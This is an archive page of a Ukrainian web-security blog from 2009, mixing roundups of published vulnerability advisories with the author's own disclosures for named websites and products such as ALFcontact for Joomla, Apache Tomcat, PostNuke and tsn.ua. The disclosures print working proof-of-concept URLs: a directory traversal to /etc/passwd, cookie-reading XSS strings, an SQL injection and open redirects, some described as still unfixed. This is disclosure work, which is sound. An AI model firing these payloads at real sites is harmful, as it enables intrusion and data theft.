Архів для категорії 'Уразливості'

Добірка уразливостей

16:11 05.09.2009

В даній добірці уразливості в веб додатках:

  • Vulnerability in Oracle WebLogic Apache Connector (деталі)
  • OpenNMS Multiple Vulnerabilities (деталі)
  • Arbitrary code execution in lynx (деталі)
  • NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability (деталі)
  • Iltaweb Alisveris, Sistemi (tr) Sql inj (деталі)
  • Oracle: CREATE ANY DIRECTORY to SYSDBA (деталі)
  • Webscene eCommerce (level) Remote Sql Injection (деталі)
  • WEB//NEWS SQL Injection and Cookie Manipulation (деталі)
  • Vivid Ads Shopping Cart (cid) Remote SQL Injection (деталі)
  • Smarty 2.6.20 php injection (деталі)

Уразливості на www.ejls.eu

22:44 04.09.2009

06.06.2009

У вересні, 18.09.2008, а також додатково сьогодні, я знайшов Arbitrary File Disclosure, Directory Traversal, Full path disclosure та Cross-Site Scripting уразливості на проекті http://www.ejls.eu. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.09.2009

Arbitrary File Disclosure:

http://www.ejls.eu/download.php?file=download.php

Directory Traversal:

http://www.ejls.eu/download.php?file=../etc/passwd

Ці дві дірки вже виправлені.

Full path disclosure:

http://www.ejls.eu/load.php?action=1

XSS:

Половина з даних уразливостей досі не виправлена.

Нові уразливості в ALFcontact для Joomla

23:51 03.09.2009

Сьогодні я знайшов Cross-Site Scripting уразливості в компоненті ALFcontact (com_alfcontact) для Joomla. Це форма відправки повідомлень власнику сайта. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в com_alfcontact для Joomla.

XSS:

Можлива атака як через POST, так і GET запити.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уразливі ALFcontact 1.8, 1.9 та попередні версії. У версії ALFcontact 1.9.1 працюють перші три з чотирьох уразливостей.

Добірка уразливостей

16:18 03.09.2009

В даній добірці уразливості в веб додатках:

  • Directory traversal and NULL pointer in Acronis PXE Server 2.0.0.1076 (деталі)
  • Yerba SACphp <= 6.3 / Local File Inclusion Exploit (деталі)
  • HostAdmin 3.* Remote File Include Vulnerabilities (деталі)
  • FOSS Gallery Public Version <= 1.0 / Arbitrary file upload Vulnerabilities (деталі)
  • FOSS Gallery Admin Version <= 1.0 / Remote Arbitrary Upload Vulnerability (деталі)
  • Unauthenticated SQL Injection, XSS on Login Page and Username Enumeration on DPSnet Case Progress (деталі)
  • News Manager Remote SQL Injection Vulnerability (деталі)
  • FC2 BLOG Cross-Site Scripting Vulnerabilities (деталі)
  • OpenX 2.4.9 and 2.6.2 fix SQL injection vulnerability (деталі)
  • HP-UX Running ftp, Remote Denial of Service (DoS) (деталі)

Уразливість в Apache Tomcat

19:12 02.09.2009

06.05.2009

У серпні, 17.08.2008, я знайшов Cross-Site Scripting уразливість в mod_jk - популярному Apache Tomcat Connector. Про що найближчим часом повідомлю розробникам mod_jk. Дірку виявив на http://wap.samsung.ua (де вона вже виправлена).

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам додатку.

02.09.2009

Спочатку я гадав, що уразливість має місце саме в Apache Tomcat Connector (mod_jk), зокрема в mod_jk 1.2.18. Але розробники Apache Tomcat повідомили мені, що дана уразливість не пов’язана з mod_jk, і може проявитися лише в Tomcat. При цьому вияснити вразливу версію Tomcat не вдалося, бо останні версії вже не вразливі (як зазначає розробник).

XSS:

Уразливість має місце на сторінці з помилкою 404 (стандартній сторінці Tomcat). При вказані XSS коду в значеннях параметрів (в скрипті на сайті), це призводить до появи сторінки з помилкою, де код спрацьовує.

http://site/?offset=1&cid=1&limit=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?offset=1&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?offset=%3Cscript%3Ealert(document.cookie)%3C/script%3E&cid=1

Уразливі старі версії Apache Tomcat. Останні версії Apache Tomcat 4.1.x, 5.5.x та 6.0.x невразливі.

P.S.

Як мені повідомили, уразливі Apache Tomcat 3.2.1 та попередні версії.

Добірка уразливостей

17:38 01.09.2009

В даній добірці уразливості в веб додатках:

  • Nokia 6212 classic URI spoofing and DoS advisory (деталі)
  • HostAdmin Cross-Site Scripting Vulnerabilities (деталі)
  • XSS vulnerability in phpMyID (деталі)
  • Context IS Advisory - MS08-39 OWA XSS (деталі)
  • Important Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747) (деталі)
  • PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability (деталі)
  • MetaGauge 1.0.0.17 Directory Traversal (деталі)
  • CMME Multiple Information disclosure vulnerabilities (деталі)
  • iFoto, CSS-based GD2 photo gallery <= 1.0: Remote File Disclosure Vulnerability (деталі)
  • Website Directory - XSS Exploit (деталі)

Добірка уразливостей

17:32 29.08.2009

В даній добірці уразливості в веб додатках:

  • Citrix Broadcast Server 6.0 login.asp SQL Injection — Update for BID 32832 (деталі)
  • Vulnerability in Mono (деталі)
  • Printlog <= 0.4: Remote File Edition Vulnerability (деталі)
  • moziloWiki - Directory Traversal, XSS and SessionFixation Issues (деталі)
  • eFront <= 3.5.1 Remote File Inclusion Vulnerability (деталі)
  • Remote and Local File Inclusion Vulnerability <= 1.1 Rportal (деталі)
  • phpMyID can act as a redirector and as headers injector (деталі)
  • FreeBSD Security Advisory FreeBSD-SA-08:12.ftpd (деталі)
  • FreeBSD Security Advisory FreeBSD-SA-09:01.lukemftpd (деталі)
  • multiple vendor ftpd - Cross-site request forgery (деталі)

Уразливості на tsn.ua

20:26 28.08.2009

04.06.2009

У вересні, 14.09.2008, я знайшов Information Leakage, Redirector і Insufficient Anti-automation уразливості (а сьогодні ще й Cross-Site Scripting і Denial of Service) на http://tsn.ua - сайті ТСН, новин канала 1+1. Про що найближчим часом сповіщу адміністрацію сайта.

В той день як раз вийшла телепередача зі мною на 1+1.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.08.2009

Information Leakage:

http://tsn.ua/adserver/1

Витік логіна.

Redirector:

http://tsn.ua/adserver/adclick.php?maxdest=http://websecurity.com.ua

http://tsn.ua/adserver/adclick.php?dest=http://websecurity.com.ua

Insufficient Anti-automation:

В новинах в формі коментарів не було захисту від автоматизованих запитів (капчі). Зараз вже зробили капчу.

Insufficient Anti-automation:

http://tsn.ua/bin/ua_form.php

В формі немає захисту від автоматизованих запитів (капчі).

XSS:

DoS (Looped DoS):

http://tsn.ua/adserver/adclick.php?

Більшість з даних уразливостей досі не виправлені.

Нова SQL Injection уразливість в PostNuke

23:53 27.08.2009

У січні, 06.01.2009, я знайшов нову SQL Injection уразливість в системі PostNuke. На додачу до раніше знайденої SQL Injection в PostNuke.

Дану уразливість я виявив, коли знайшов уразливості на www.agrocombank.kiev.ua, де використовувся даний движок.

SQL Injection:

http://site/modules.php?op=modload&name=AStatic&file=index&sid=-1%20or%20version()%3E4

Уразлива версія PostNuke 0.7.2 та попередні версії (та потенційно наступні версії).

Добірка уразливостей

16:13 27.08.2009

В даній добірці уразливості в веб додатках:

  • Paper by Amit Klein (Trusteer): “PowerDNS Recursor DNS Cache Poisoning [pharming]” (деталі)
  • Login Password Sample Remote Password Disclouse Vulnerability (деталі)
  • PHP Calendar Script Remote XSS (Permanent) Vulnerabilities (деталі)
  • ParsaWeb CMS SQL Injection (деталі)
  • XSRF vulnerability in FtitzBox (деталі)
  • Crux Gallery <= 1.32 / Insecure Cookie Handling Vulnerability (деталі)
  • The Gemini Portal <= 4.7 / Insecure Cookie Handling Vulnerability (деталі)
  • RPG.Board <= 0.0.8Beta2 Remote SQL Injection (деталі)
  • GroupWise 7.0 mailto: scheme buffer overflow (деталі)
  • Oracle Application Server 10G ORA_DAV Basic Authentication Bypass Vulnerability (деталі)